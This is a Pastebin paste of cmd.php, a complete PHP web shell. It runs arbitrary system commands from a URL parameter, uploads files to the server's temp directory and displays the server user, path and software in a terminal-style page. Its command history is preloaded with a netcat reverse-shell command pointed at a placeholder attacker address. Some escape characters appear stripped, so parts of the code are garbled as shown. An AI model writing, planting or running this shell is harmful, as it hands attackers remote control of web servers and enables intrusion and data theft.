Advertisement
CreadPag

cmd.php

Jul 21st, 2016
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.40 KB | None | 0 0
  1. <?php
  2.     if(isset($_GET['id']))
  3.     {
  4.         $command = stripslashes($_GET['id']);
  5.         exec($command . " 2>&1",$out);
  6.         foreach($out as $o)
  7.             echo $o . "n";
  8.     }
  9.         else if(isset($_FILES['file']['tmp_name']))
  10.         {
  11.             $name = basename($_FILES['file']['name']);
  12.             if(move_uploaded_file($_FILES['file']['tmp_name'], $_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp" . "/" . basename($_FILES['file']['name'])))
  13.             {
  14.                 echo "<textarea style='color:white;'>$name: Success!</textarea>";
  15.             }
  16.             else
  17.             {
  18.                 echo "<textarea style='color:white;'>$name: Failure!</textarea>";
  19.             }
  20.             exit();
  21.            
  22.         }
  23.     else
  24.     {
  25. ?>
  26. <html>
  27. <head>
  28. <title>PHP Shell</title>
  29. <style>
  30.  
  31. * {
  32.   margin: 0;
  33.   padding: 0;
  34.   border: 0;
  35.   overflow-y: hidden;
  36.   background-color:black;
  37.   color: white;
  38. }
  39. html,body{
  40. height: 100%;
  41. }
  42. .wrapper{
  43.    min-height:100%;
  44.    margin 0 auto -2em;
  45. }
  46. .output{
  47.   color: white;
  48.   font-family:"Courier New",monospace;
  49.   font-size:12px;
  50.   width: 100%;
  51.   height: 90%;
  52. }
  53. .input{
  54.   float: left;
  55.   border-bottom:2px inset white;
  56.   border-top:2px inset white;
  57.   color: white;
  58.   background-color: black;
  59.   font-family:"Courier New",monospace;
  60.   font-size:12px;
  61.   width: 80%;
  62.   height: 4%;
  63. }
  64. .info{
  65.   clear: both;
  66.   display: block;
  67.   color:white;
  68.   font-family:"Courier New",monospace;
  69.   font-size:12px;
  70.   width: 100%;
  71.   height: 2em;
  72.   margin-top: -2em;
  73. }
  74. .popup{
  75.   position:absolute;
  76.   left: 0px;
  77.   top: 0px;
  78.   z-index:10;
  79.   border:5px;
  80.   border-style:double;
  81.   border-color:white;
  82.   height:100px;
  83.   width:400px;
  84.   font-family:"Courier New",monospace;
  85.   font-size:12px;
  86.  
  87. }
  88. .push{
  89.     height: 2em;
  90. }
  91. .form1{
  92.   height:100%;
  93. }
  94. .button{
  95.   border:0px;
  96.   border-left:1px outset white;
  97.   border-top:1px outset white;
  98.   border-bottom:1px outset white;
  99.   color:white;
  100.   background-color: black;
  101.   font-family:"Courier New",monospace;
  102.   font-size:12px;
  103.   text-align: center;
  104.   height: 4%;
  105.   width:10%;
  106.   float:right;
  107. }
  108. p{ color:white; }
  109. </style>
  110.  
  111. <script type="text/javascript">
  112.  
  113. http = new XMLHttpRequest();
  114. var bash_history = new Array(10);
  115. bash_history[0] = "nc yourIPAddress 4444 -e /bin/bash"
  116. var history_newest = 0;
  117. var history_oldest = 0;
  118. var history_place = -1;
  119. function submitform(myfield, e)
  120. {
  121.   var key;
  122.   if(window.event)
  123.     {
  124.       key = window.event.keyCode;
  125.     }
  126.   else if(e) key = e.which;
  127.   else return true;
  128.  
  129.     if(key == 13)
  130.     {
  131.         updateData(document.form1.input.value);
  132.         document.form1.input.value="";
  133.         return false;
  134.     }
  135.     else if(key == 38) // Up Arrow
  136.     {
  137.         if(history_place != history_oldest)
  138.         {
  139.             //go up in history
  140.             if(history_place == -1)
  141.             {
  142.                 history_place = history_newest;
  143.             }          
  144.             else
  145.             {
  146.                 history_place--;
  147.                 if(history_place == -1)
  148.                 {
  149.                     history_place += 10;
  150.                 }
  151.             }
  152.             document.form1.input.value = bash_history[history_place];
  153.         }
  154.         else
  155.         {
  156.             document.form1.input.value = bash_history[history_oldest];
  157.         }
  158.    
  159.         return false;
  160.     }
  161.     else if(key == 40) // Down Arrow
  162.     {
  163.         if(history_place == -1 || history_newest == history_oldest || history_place == history_newest)
  164.         {
  165.             history_place = -1;
  166.             document.form1.input.value = "";
  167.         }
  168.         else
  169.         {
  170.             history_place = (history_place + 1)%10;
  171.             document.form1.input.value = bash_history[history_place];
  172.         }
  173.         return false;
  174.     }
  175.     else
  176.     {
  177.         return true;
  178.     }
  179. }
  180.  
  181. function updateData(param)
  182. {
  183.     if(param == "")
  184.     {
  185.         return;
  186.     }
  187.     //manage bash_history
  188.    
  189.     history_newest = history_newest + 1;
  190.     if(history_newest == 10)
  191.     {
  192.         history_newest = 0;
  193.     }
  194.     if(history_newest == history_oldest)
  195.     {
  196.         history_oldest = history_oldest + 1;
  197.         if(history_oldest == 10)
  198.         {
  199.             history_oldest = 0;
  200.         }
  201.     }
  202.     bash_history[history_newest] = param;
  203.     history_place = -1;
  204.  
  205.     if(param == "clear")
  206.     {
  207.         document.form1.output.value = "";
  208.         return;
  209.     }
  210.    
  211.     document.form1.output.value+= "$: " + param + "n";
  212.     document.form1.output.scrollTop = document.form1.output.scrollHeight;
  213.     var myurl = <?php echo """ . $_SERVER['REQUEST_URI']. """; ?>
  214.  
  215.     http.open("GET", myurl + "?id=" + escape(param), true);
  216.     http.onreadystatechange = useHttpResponse;
  217.     http.send(null);
  218.  
  219. }
  220.  
  221. function useHttpResponse() {
  222.   if (http.readyState == 4) {
  223.     var textout = http.responseText;
  224.     document.form1.output.value+=textout;
  225.     document.form1.output.scrollTop = document.form1.output.scrollHeight;
  226.   }
  227. }
  228.  
  229. function fileUploadBox() {
  230.   var uploadDiv = document.createElement("div");
  231.   uploadDiv.setAttribute("align","center");
  232.   uploadDiv.id="upload_box";
  233.   uploadDiv.className = "popup";
  234.   uploadDiv.innerHTML="<form id='file_upload' method='post' enctype='multipart/form-data' target='uploader'><input name='file' id='file' type='file' />
  235. <input type='submit' name='action' value='Upload to <?php echo htmlentities($_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp"); ?>' style='border:1px solid white;'/>
  236. <iframe name='uploader' id='uploader' src='<?php echo "./" . $_SERVER['REQUEST_URI'];?>' width='0' height='0' style='display:none;'></iframe></form><button name='close_button' class='button' type='button' style='height:3em;width:30%;' onclick='var element = document.getElementById("upload_box"); element.parentNode.removeChild(element);' readonly=true>Close!</button>";
  237.   document.body.appendChild(uploadDiv);
  238.    
  239. }
  240. </script>
  241.  
  242. </head>
  243. <body onLoad="document.form1.input.focus(); document.form1.output.scrollTop = document.form1.output.scrollHeight" onKeyDown="return submitform(this, event)">
  244.  
  245. <div class="wrapper">
  246. <form name="form1">
  247. <textarea name="output" class="output" readonly=true></textarea>
  248. <script>document.form1.output.value="";document.title="PHP Shell: " + window.location.hostname;</script>
  249. <textarea name="input" class="input"></textarea>
  250. <button name="upload_button" class="button" type="button" readonly=true onclick="fileUploadBox();">Upload!</button>
  251. <button name="submit_button" class="button" type="button" readonly=true onclick="updateData(document.form1.input.value); document.form1.input.value=''">Execute!</button>
  252. </form>
  253.  
  254. <div class="push"></div>
  255.  
  256. </div>
  257.  
  258. <textarea name="info" class="info" readonly=true>
  259. <?php
  260. exec("whoami",$who);
  261. $pwd=$_SERVER["DOCUMENT_ROOT"];
  262. $sys=PHP_OS . ", " .$_SERVER['SERVER_SOFTWARE']. ", " . phpversion();
  263. echo "user: $who[0]tlocation: $pwdtsystem: $sys";
  264. ?>
  265. </textarea>
  266. </body>
  267. </html>
  268. <?php
  269.     }
  270. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement